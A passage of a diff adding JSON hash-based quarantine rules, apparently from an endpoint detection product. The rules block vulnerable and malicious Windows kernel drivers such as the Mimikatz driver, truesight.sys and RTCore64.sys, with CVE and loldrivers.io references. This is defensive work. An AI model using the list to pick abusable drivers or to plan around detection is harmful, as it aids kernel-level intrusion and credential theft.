+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467849Z",
+ "creation_date": "2026-03-23T11:45:30.467852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0895a8fa3ee38bb38cb9fcd0183cf9466c7577eab746b3540bd0b2f282246dc6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a0b47ed-623a-5a9a-8cd6-e148521a72d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488466Z",
+ "creation_date": "2026-03-23T11:45:31.488468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99d89d9b0352e810b9084e8a4273c5a5e1609c72029e9115e9bc1407bbea9f35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a0fa602-fb5e-5a76-a3c0-f8fe830e7417",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973322Z",
+ "creation_date": "2026-03-23T11:45:29.973324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d884ca8cc4ef1826ca3ab03eb3c2d8f356ba25f2d20db0a7d9fc251c565be7f3",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a238d8c-3820-5fa6-8114-211d31f65d87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830890Z",
+ "creation_date": "2026-03-23T11:45:30.830892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afe2ddf92a2c0f32c58ab6fdd40bf1120d161e036ac54a3cb29e5f8cb98d4c37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a2a6a4c-262e-58e9-bf5e-32c498eda778",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142072Z",
+ "creation_date": "2026-03-23T11:45:31.142074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e4469b142f388b6fbe9ce712ee00d590087d470ca5be8bb19df321ce5b4bbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a2d86d2-d71c-502a-8a32-26df74ac78a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616783Z",
+ "creation_date": "2026-03-23T11:45:29.616785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d052299252f0f0bd70b5e7c46b9ca71a99a052b47f693582becb6f0d567e8245",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a37ec5b-f4ee-5e25-8c8a-14b5a498cba9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468719Z",
+ "creation_date": "2026-03-23T11:45:30.468722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468730Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c87d5f1261a367493fd2f240ace027bef5b178cff3dea22d45e8fa2b0f0541e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a38406a-f562-5371-91b7-7052ae1b7f15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610512Z",
+ "creation_date": "2026-03-23T11:45:29.610514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67734c7c0130dd66c964f76965f09a2290da4b14c94412c0056046e700654bdc",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a3d5498-891b-5876-bc24-6e640dbb2556",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482507Z",
+ "creation_date": "2026-03-23T11:45:31.482511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "167076cfb884ad82996eac9cf9dd02aec1e149ddfff11b5c4e8fc378f4898944",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a408110-c1d3-50c6-bc13-0416ed7a34b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829978Z",
+ "creation_date": "2026-03-23T11:45:30.829980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3468c3bdd003bc14864251addf657ddc5111e8c2fbfd14678cc98fec06f112f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a4339fd-e588-5ec0-a0d6-01a5a746d1ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462670Z",
+ "creation_date": "2026-03-23T11:45:30.462674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8c71e1844e987cd6f9c2baf28d9520d4ccdd8593ce7051bb1b3c9bf1d97076a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a4783a3-0442-5285-9d29-47352d6c28d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822746Z",
+ "creation_date": "2026-03-23T11:45:30.822748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11e76c3f091b3771d881e82f7171e72228bd43877aeea9008d7de4bda184aec2",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a496165-fea9-5a6c-a60e-2a31daa12650",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983473Z",
+ "creation_date": "2026-03-23T11:45:29.983475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a269dd0a03e32e5b2a1c8ab0768791962e040d080d44dc44dab01dd7954f2b",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a51b5e9-d549-5b8e-a04c-d94dc20a213e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457336Z",
+ "creation_date": "2026-03-23T11:45:30.457340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440",
+ "comment": "Malicious Kernel Driver (aka 4748696211bd56c2d93c21cab91e82a5.sys) [https://www.loldrivers.io/drivers/2d6c1da6-17e2-4385-ad93-1430f83bde83/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a6293fa-8db4-5c7d-a184-0bb3905bc3f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607470Z",
+ "creation_date": "2026-03-23T11:45:29.607472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf6c6c2d231eaf67dfc87561cc9a56ecef89ab50baafee5a67962748d51faf3",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a68153b-1bd7-52b4-a5ce-050c2b7db2db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462171Z",
+ "creation_date": "2026-03-23T11:45:30.462174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7a6c3a40724ba871e13d9c55b7967ed252777a2382fea86e4ed6a2a8203fb4a",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a6c7d63-0f96-53a2-9170-10068c0f4992",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480015Z",
+ "creation_date": "2026-03-23T11:45:31.480019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480029Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24790097b421265d0cd487a141d6ca7a1e6dd1064d6e333b50335649115580b7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a6e9ebc-b0ed-558f-a81f-33087ea978ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611150Z",
+ "creation_date": "2026-03-23T11:45:29.611152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aa61910c3ceb765441c35925a50983b2571ac22da510f1495cf82f078b535b6",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a7162fa-e102-56de-a25c-5d16f2a4469c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142646Z",
+ "creation_date": "2026-03-23T11:45:31.142648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13241f289d7485b2ff12636ea372ebc6a3f74f427a1d98edf300d6d03b7ad177",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a7ace89-fdd3-579e-b0c6-e6bccbe1c4b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973889Z",
+ "creation_date": "2026-03-23T11:45:29.973891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a903f329b70f0078197cb7683aae1bb432eaf58572fe572f7cb4bc2080042d7e",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a8d6678-3710-5568-b5d2-1ab9a24c45dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829096Z",
+ "creation_date": "2026-03-23T11:45:31.829099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "857a12a70625608a37404e85476180042c5be465ac7d7ba9ed6b126995182218",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a8fd3b6-87a5-56ec-89d3-33148e7f16f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825106Z",
+ "creation_date": "2026-03-23T11:45:31.825110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c55e8ca84c630170f790b8f9046f7cc555819aa0aa82728986d50cb5be5bd671",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a91bd9d-f542-53e0-b2a2-d05f717967f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
